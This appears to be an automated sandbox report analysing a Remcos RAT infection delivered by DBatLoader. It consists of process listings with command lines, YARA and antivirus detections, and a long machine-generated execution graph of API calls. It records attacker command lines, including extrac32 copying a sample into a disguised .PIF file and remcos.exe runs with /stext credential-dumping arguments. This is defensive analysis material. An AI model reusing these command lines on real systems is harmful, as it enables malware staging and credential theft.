                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\CmzcxhwnO.bat" "
                                                                                                                                                  Imagebase:0xa40000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:07:20:34
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:07:20:34
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\fu56fbrtn8.exe C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIF
                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:07:20:35
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000006.00000002.3821247162.0000000002DF1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                  • Detection: 73%, Virustotal, Browse
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:07:20:39
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:07:20:43
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Users\Public\Libraries\Cmzcxhwn.PIF
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\Public\Libraries\Cmzcxhwn.PIF"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1549703628.0000000014AFB000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.1533650563.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                  • Detection: 73%, Virustotal, Browse
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:07:20:45
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\kcrrhbu"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:07:20:45
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\uxwkztfesgm"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:07:20:45
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\fzkcamqygoemct"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:07:20:51
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cidefd"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:14
                                                                                                                                                  Start time:07:20:51
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\mkqxyvffd"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:15
                                                                                                                                                  Start time:07:20:51
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wevpzoqgrjkc"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:16
                                                                                                                                                  Start time:07:20:53
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000010.00000002.1649498271.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1659495150.000000001514B000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:17
                                                                                                                                                  Start time:07:21:02
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1752157140.000000001515B000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1739100863.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1739100863.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:18
                                                                                                                                                  Start time:07:21:11
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Users\Public\Libraries\Cmzcxhwn.PIF
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\Public\Libraries\Cmzcxhwn.PIF"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000012.00000002.1789281992.0000000002D51000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:19
                                                                                                                                                  Start time:07:21:20
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Has exited:true

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:5.7%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:9.7%
                                                                                                                                                    Total number of Nodes:1258
                                                                                                                                                    Total number of Limit Nodes:25
                                                                                                                                                    execution_graph 80058 2e01ac0 81492 2de4824 80058->81492 81493 2de4835 81492->81493 81494 2de485b 81493->81494 81495 2de4872 81493->81495 81501 2de4b90 81494->81501 81510 2de4564 81495->81510 81498 2de4868 81499 2de48a3 81498->81499 81515 2de44f4 81498->81515 81502 2de4b9d 81501->81502 81509 2de4bcd 81501->81509 81504 2de4bc6 81502->81504 81507 2de4ba9 81502->81507 81505 2de4564 11 API calls 81504->81505 81505->81509 81506 2de4bb7 81506->81498 81521 2de2c44 11 API calls 81507->81521 81522 2de44a0 81509->81522 81511 2de458c 81510->81511 81512 2de4568 81510->81512 81511->81498 81527 2de2c10 11 API calls 81512->81527 81514 2de4575 81514->81498 81516 2de44f8 81515->81516 81519 2de4508 81515->81519 81518 2de4564 11 API calls 81516->81518 81516->81519 81517 2de4536 81517->81499 81518->81519 81519->81517 81528 2de2c2c 11 API calls 81519->81528 81521->81506 81523 2de44a6 81522->81523 81524 2de44c1 81522->81524 81523->81524 81526 2de2c2c 11 API calls 81523->81526 81524->81506 81526->81524 81527->81514 81528->81517 81529 2e09b30 81532 2dfd5d0 81529->81532 81533 2dfd5d8 81532->81533 81533->81533 84053 2de2ee0 QueryPerformanceCounter 81533->84053 81535 2dfd5f9 81536 2dfd603 InetIsOffline 81535->81536 81537 2dfd61e 81536->81537 81538 2dfd60d 81536->81538 81540 2de44f4 11 API calls 81537->81540 81539 2de44f4 11 API calls 81538->81539 81541 2dfd61c 81539->81541 81542 2dfd62d 81540->81542 81541->81542 81543 2de4824 11 API calls 81542->81543 81544 2dfd64b 81543->81544 81545 2dfd653 81544->81545 81546 2dfd65d 81545->81546 84056 2de47b0 81546->84056 81548 2dfd676 81549 2dfd67e 81548->81549 81550 2dfd688 81549->81550 84071 2df7be8 81550->84071 81553 2de4824 11 API calls 81554 2dfd6af 81553->81554 81555 2dfd6c1 81554->81555 81556 2de47b0 11 API calls 81555->81556 81557 2dfd6da 81556->81557 81558 2dfd6e2 81557->81558 81559 2dfd6ec 81558->81559 81560 2df7be8 17 API calls 81559->81560 81561 2dfd6f5 81560->81561 81562 2de4824 11 API calls 81561->81562 81563 2dfd713 81562->81563 81564 2dfd725 81563->81564 81565 2de47b0 11 API calls 81564->81565 81566 2dfd73e 81565->81566 81567 2dfd746 81566->81567 81568 2dfd750 81567->81568 81569 2df7be8 17 API calls 81568->81569 81570 2dfd759 81569->81570 81571 2de4824 11 API calls 81570->81571 81572 2dfd777 81571->81572 81573 2dfd77f 81572->81573 81574 2dfd789 81573->81574 81575 2de47b0 11 API calls 81574->81575 81576 2dfd7a2 81575->81576 84080 2de4964 81576->84080 81578 2dfd7aa 81579 2dfd7b4 81578->81579 81580 2df7be8 17 API calls 81579->81580 81581 2dfd7bd 81580->81581 81582 2de4824 11 API calls 81581->81582 81583 2dfd7db 81582->81583 81584 2dfd7e3 81583->81584 81585 2dfd7ed 81584->81585 81586 2de47b0 11 API calls 81585->81586 81587 2dfd806 81586->81587 81588 2dfd80e 81587->81588 81589 2dfd818 81588->81589 81590 2df7be8 17 API calls 81589->81590 81591 2dfd821 81590->81591 81592 2dfd82e 81591->81592 81593 2dfd83f 81592->81593 81594 2df7be8 17 API calls 81593->81594 81595 2dfd848 81594->81595 81596 2dfd855 81595->81596 81597 2df7be8 17 API calls 81596->81597 81598 2dfd86f 81597->81598 81599 2dfd87c 81598->81599 81600 2dfd88d 81599->81600 81601 2df7be8 17 API calls 81600->81601 81602 2dfd896 81601->81602 81603 2de4824 11 API calls 81602->81603 81604 2dfd8b4 81603->81604 81605 2dfd8bc 81604->81605 81606 2dfd8c6 81605->81606 81607 2de47b0 11 API calls 81606->81607 81608 2dfd8df 81607->81608 81609 2dfd8e7 81608->81609 81610 2dfd8f1 81609->81610 81611 2df7be8 17 API calls 81610->81611 81612 2dfd8fa 81611->81612 81613 2dfd907 81612->81613 81614 2dfd918 81613->81614 81615 2df7be8 17 API calls 81614->81615 81616 2dfd921 81615->81616 84082 2de4698 81616->84082 84054 2de2eed 84053->84054 84055 2de2ef8 GetTickCount 84053->84055 84054->81535 84055->81535 84057 2de47b4 84056->84057 84058 2de4815 84056->84058 84059 2de47bc 84057->84059 84060 2de44f4 84057->84060 84059->84058 84061 2de47cb 84059->84061 84063 2de44f4 11 API calls 84059->84063 84064 2de4564 11 API calls 84060->84064 84066 2de4508 84060->84066 84065 2de4564 11 API calls 84061->84065 84062 2de4536 84062->81548 84063->84061 84064->84066 84068 2de47e5 84065->84068 84066->84062 84084 2de2c2c 11 API calls 84066->84084 84069 2de44f4 11 API calls 84068->84069 84070 2de4811 84069->84070 84070->81548 84072 2df7bfd 84071->84072 84073 2df7c05 LoadLibraryW GetModuleHandleW 84072->84073 84074 2de4964 84073->84074 84075 2df7c30 GetProcAddress 84074->84075 84085 2df7b20 84075->84085 84077 2df7c57 84094 2de44c4 84077->84094 84081 2de4968 84080->84081 84081->81578 84083 2de469e 84082->84083 84084->84062 84098 2de4538 84085->84098 84088 2de47b0 11 API calls 84089 2df7b53 84088->84089 84090 2df7b5b GetModuleHandleA GetProcAddress VirtualProtect 84089->84090 84091 2df7b97 84090->84091 84092 2de44c4 11 API calls 84091->84092 84093 2df7ba4 84092->84093 84093->84077 84095 2de44ca 84094->84095 84096 2de44f0 84095->84096 84103 2de2c2c 11 API calls 84095->84103 84096->81553 84100 2de453c 84098->84100 84099 2de4560 84099->84088 84100->84099 84102 2de2c2c 11 API calls 84100->84102 84102->84099 84103->84095 84104 2de1c6c 84105 2de1c7c 84104->84105 84106 2de1d04 84104->84106 84107 2de1c89 84105->84107 84108 2de1cc0 84105->84108 84109 2de1d0d 84106->84109 84110 2de1f58 84106->84110 84112 2de1c94 84107->84112 84152 2de1724 84107->84152 84111 2de1724 10 API calls 84108->84111 84114 2de1d25 84109->84114 84128 2de1e24 84109->84128 84113 2de1fec 84110->84113 84115 2de1fac 84110->84115 84116 2de1f68 84110->84116 84135 2de1cd7 84111->84135 84119 2de1d2c 84114->84119 84120 2de1d48 84114->84120 84125 2de1dfc 84114->84125 84122 2de1fb2 84115->84122 84126 2de1724 10 API calls 84115->84126 84123 2de1724 10 API calls 84116->84123 84118 2de1e7c 84124 2de1724 10 API calls 84118->84124 84137 2de1e95 84118->84137 84129 2de1d79 Sleep 84120->84129 84144 2de1d9c 84120->84144 84121 2de1cfd 84142 2de1f82 84123->84142 84139 2de1f2c 84124->84139 84130 2de1724 10 API calls 84125->84130 84143 2de1fc1 84126->84143 84127 2de1cb9 84128->84118 84131 2de1e55 Sleep 84128->84131 84128->84137 84133 2de1d91 Sleep 84129->84133 84129->84144 84147 2de1e05 84130->84147 84131->84118 84136 2de1e6f Sleep 84131->84136 84132 2de1fa7 84133->84120 84134 2de1ca1 84134->84127 84176 2de1a8c 84134->84176 84135->84121 84141 2de1a8c 8 API calls 84135->84141 84136->84128 84139->84137 84146 2de1a8c 8 API calls 84139->84146 84140 2de1e1d 84141->84121 84142->84132 84145 2de1a8c 8 API calls 84142->84145 84143->84132 84148 2de1a8c 8 API calls 84143->84148 84145->84132 84149 2de1f50 84146->84149 84147->84140 84150 2de1a8c 8 API calls 84147->84150 84151 2de1fe4 84148->84151 84150->84140 84153 2de173c 84152->84153 84154 2de1968 84152->84154 84155 2de174e 84153->84155 84166 2de17cb Sleep 84153->84166 84156 2de1938 84154->84156 84157 2de1a80 84154->84157 84158 2de175d 84155->84158 84167 2de180a Sleep 84155->84167 84168 2de182c 84155->84168 84162 2de1947 Sleep 84156->84162 84165 2de1986 84156->84165 84159 2de1a89 84157->84159 84160 2de1684 VirtualAlloc 84157->84160 84158->84134 84159->84134 84161 2de16af 84160->84161 84169 2de16bf 84160->84169 84193 2de1644 84161->84193 84164 2de195d Sleep 84162->84164 84162->84165 84164->84156 84171 2de15cc VirtualAlloc 84165->84171 84174 2de19a4 84165->84174 84166->84155 84170 2de17e4 Sleep 84166->84170 84167->84168 84172 2de1820 Sleep 84167->84172 84175 2de1838 84168->84175 84199 2de15cc 84168->84199 84169->84134 84170->84153 84171->84174 84172->84155 84174->84134 84175->84134 84177 2de1b6c 84176->84177 84178 2de1aa1 84176->84178 84180 2de1aa7 84177->84180 84182 2de16e8 84177->84182 84179 2de1b13 Sleep 84178->84179 84178->84180 84179->84180 84184 2de1b2d Sleep 84179->84184 84181 2de1ab0 84180->84181 84186 2de1b4b Sleep 84180->84186 84190 2de1b81 84180->84190 84181->84127 84183 2de1c66 84182->84183 84185 2de1644 2 API calls 84182->84185 84183->84127 84184->84178 84187 2de16f5 VirtualFree 84185->84187 84188 2de1b61 Sleep 84186->84188 84186->84190 84189 2de170d 84187->84189 84188->84180 84189->84127 84191 2de1c00 VirtualFree 84190->84191 84192 2de1ba4 84190->84192 84191->84127 84192->84127 84194 2de1681 84193->84194 84195 2de164d 84193->84195 84194->84169 84195->84194 84196 2de164f Sleep 84195->84196 84197 2de1664 84196->84197 84197->84194 84198 2de1668 Sleep 84197->84198 84198->84195 84203 2de1560 84199->84203 84201 2de15d4 VirtualAlloc 84202 2de15eb 84201->84202 84202->84175 84204 2de1500 84203->84204 84204->84201 84205 2e0a2f4 84215 2de6530 84205->84215 84209 2e0a322 84220 2e09b3c timeSetEvent 84209->84220 84211 2e0a32c 84212 2e0a33a GetMessageA 84211->84212 84213 2e0a34a 84212->84213 84214 2e0a32e TranslateMessage DispatchMessageA 84212->84214 84214->84212 84216 2de653b 84215->84216 84221 2de415c 84216->84221 84219 2de4270 SysAllocStringLen SysFreeString SysReAllocStringLen 84219->84209 84220->84211 84222 2de41a2 84221->84222 84223 2de43ac 84222->84223 84224 2de421b 84222->84224 84226 2de43dd 84223->84226 84230 2de43ee 84223->84230 84235 2de40f4 84224->84235 84240 2de4320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 84226->84240 84229 2de43e7 84229->84230 84231 2de4433 FreeLibrary 84230->84231 84232 2de4457 84230->84232 84231->84230 84233 2de4466 ExitProcess 84232->84233 84234 2de4460 84232->84234 84234->84233 84236 2de4137 84235->84236 84237 2de4104 84235->84237 84236->84219 84237->84236 84239 2de15cc VirtualAlloc 84237->84239 84241 2de582c 84237->84241 84239->84237 84240->84229 84242 2de583c GetModuleFileNameA 84241->84242 84243 2de5858 84241->84243 84245 2de5a90 GetModuleFileNameA RegOpenKeyExA 84242->84245 84243->84237 84246 2de5b13 84245->84246 84247 2de5ad3 RegOpenKeyExA 84245->84247 84263 2de58cc 12 API calls 84246->84263 84247->84246 84248 2de5af1 RegOpenKeyExA 84247->84248 84248->84246 84250 2de5b9c lstrcpynA GetThreadLocale GetLocaleInfoA 84248->84250 84252 2de5cb6 84250->84252 84253 2de5bd3 84250->84253 84251 2de5b38 RegQueryValueExA 84254 2de5b76 RegCloseKey 84251->84254 84255 2de5b58 RegQueryValueExA 84251->84255 84252->84243 84253->84252 84257 2de5be3 lstrlenA 84253->84257 84254->84243 84255->84254 84258 2de5bfb 84257->84258 84258->84252 84259 2de5c48 84258->84259 84260 2de5c20 lstrcpynA LoadLibraryExA 84258->84260 84259->84252 84261 2de5c52 lstrcpynA LoadLibraryExA 84259->84261 84260->84259 84261->84252 84262 2de5c84 lstrcpynA LoadLibraryExA 84261->84262 84262->84252 84263->84251 84264 156b4887 84265 156b4893 ___scrt_is_nonwritable_in_current_image 84264->84265 84291 156b4596 84265->84291 84267 156b489a 84269 156b48c3 84267->84269 84579 156b49f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 84267->84579 84270 156b4902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 84269->84270 84580 156c4251 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 84269->84580 84275 156b4962 84270->84275 84582 156c33e7 35 API calls 3 library calls 84270->84582 84272 156b48dc 84274 156b48e2 ___scrt_is_nonwritable_in_current_image 84272->84274 84581 156c41f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 84272->84581 84302 156b4b14 84275->84302 84292 156b459f 84291->84292 84587 156b4c52 IsProcessorFeaturePresent 84292->84587 84294 156b45ab 84588 156b8f31 10 API calls 4 library calls 84294->84588 84296 156b45b0 84297 156b45b4 84296->84297 84589 156c40bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 84296->84589 84297->84267 84299 156b45bd 84300 156b45cb 84299->84300 84590 156b8f5a 8 API calls 3 library calls 84299->84590 84300->84267 84591 156b6e90 84302->84591 84305 156b4968 84306 156c41a2 84305->84306 84593 156cf059 84306->84593 84308 156b4971 84311 1568e9c5 84308->84311 84310 156c41ab 84310->84308 84597 156c6815 35 API calls 84310->84597 84599 1569cb50 LoadLibraryA GetProcAddress 84311->84599 84313 1568e9e1 GetModuleFileNameW 84604 1568f3c3 84313->84604 84315 1568e9fd 84619 156820f6 84315->84619 84318 156820f6 28 API calls 84319 1568ea1b 84318->84319 84625 1569be1b 84319->84625 84323 1568ea2d 84651 15681e8d 84323->84651 84325 1568ea36 84326 1568ea49 84325->84326 84327 1568ea93 84325->84327 84856 1568fbb3 116 API calls 84326->84856 84657 15681e65 84327->84657 84330 1568eaa3 84334 15681e65 22 API calls 84330->84334 84331 1568ea5b 84332 15681e65 22 API calls 84331->84332 84333 1568ea67 84332->84333 84857 15690f37 36 API calls __EH_prolog 84333->84857 84335 1568eac2 84334->84335 84662 1568531e 84335->84662 84338 1568ead1 84667 15686383 84338->84667 84339 1568ea79 84858 1568fb64 77 API calls 84339->84858 84343 1568ea82 84859 1568f3b0 70 API calls 84343->84859 84579->84267 84580->84272 84581->84270 84582->84275 84587->84294 84588->84296 84589->84299 84590->84297 84592 156b4b27 GetStartupInfoW 84591->84592 84592->84305 84594 156cf062 84593->84594 84596 156cf06b 84593->84596 84598 156cef58 48 API calls 5 library calls 84594->84598 84596->84310 84597->84310 84598->84596 84600 1569cb8f LoadLibraryA GetProcAddress 84599->84600 84601 1569cb7f GetModuleHandleA GetProcAddress 84599->84601 84602 1569cbb8 44 API calls 84600->84602 84603 1569cba8 LoadLibraryA GetProcAddress 84600->84603 84601->84600 84602->84313 84603->84602 84898 1569b4a8 FindResourceA 84604->84898 84608 1568f3ed _Yarn 84910 156820b7 84608->84910 84611 15681fe2 28 API calls 84612 1568f413 84611->84612 84613 15681fd8 11 API calls 84612->84613 84614 1568f41c 84613->84614 84615 156bbd51 ___std_exception_copy 21 API calls 84614->84615 84616 1568f42d _Yarn 84615->84616 84916 15686dd8 84616->84916 84618 1568f460 84618->84315 84620 1568210c 84619->84620 84621 156823ce 11 API calls 84620->84621 84622 15682126 84621->84622 84623 15682569 28 API calls 